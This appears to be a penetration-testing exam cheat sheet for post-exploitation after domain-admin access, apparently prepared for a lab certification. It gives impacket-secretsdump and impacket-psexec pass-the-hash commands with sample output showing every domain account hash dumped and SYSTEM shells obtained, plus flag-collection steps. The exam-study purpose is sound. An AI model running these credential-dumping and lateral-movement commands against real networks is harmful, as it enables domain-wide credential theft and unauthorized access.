POST-EXPLOITATION (AFTER DA)

Dump all hashes

Every account hash in domain — Complete compromise

impacket-secretsdump <domain>/Administrator@<DC_IP> -hashes :<hash>
Example Output
impacket-secretsdump corp.local/Administrator@10.10.10.5 -hashes :31d6cfe...
Administrator:500:aad3b...:31d6cfe...
krbtgt:502:aad3b...:f3bc61...
john.smith:1001:aad3b...:8846f7...
(1247 accounts dumped - full domain compromise)

Access any machine

SYSTEM on any domain machine — Prove impact for report

impacket-psexec <domain>/Administrator@<target> -hashes :<hash>
Example Output
impacket-psexec corp.local/Administrator@10.10.10.20 -hashes :31d6cfe...
C:\Windows\system32> whoami
nt authority\system
(SYSTEM on any machine in the domain)

Flag collection

Exam flag files — Screenshot with whoami & ipconfig

type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\<user>\Desktop\local.txt
Example Output
type C:\Users\Administrator\Desktop\proof.txt
<flag_hash_here>

SCREENSHOT MUST INCLUDE:
- The flag content
- whoami output
- ipconfig output
- All in same terminal window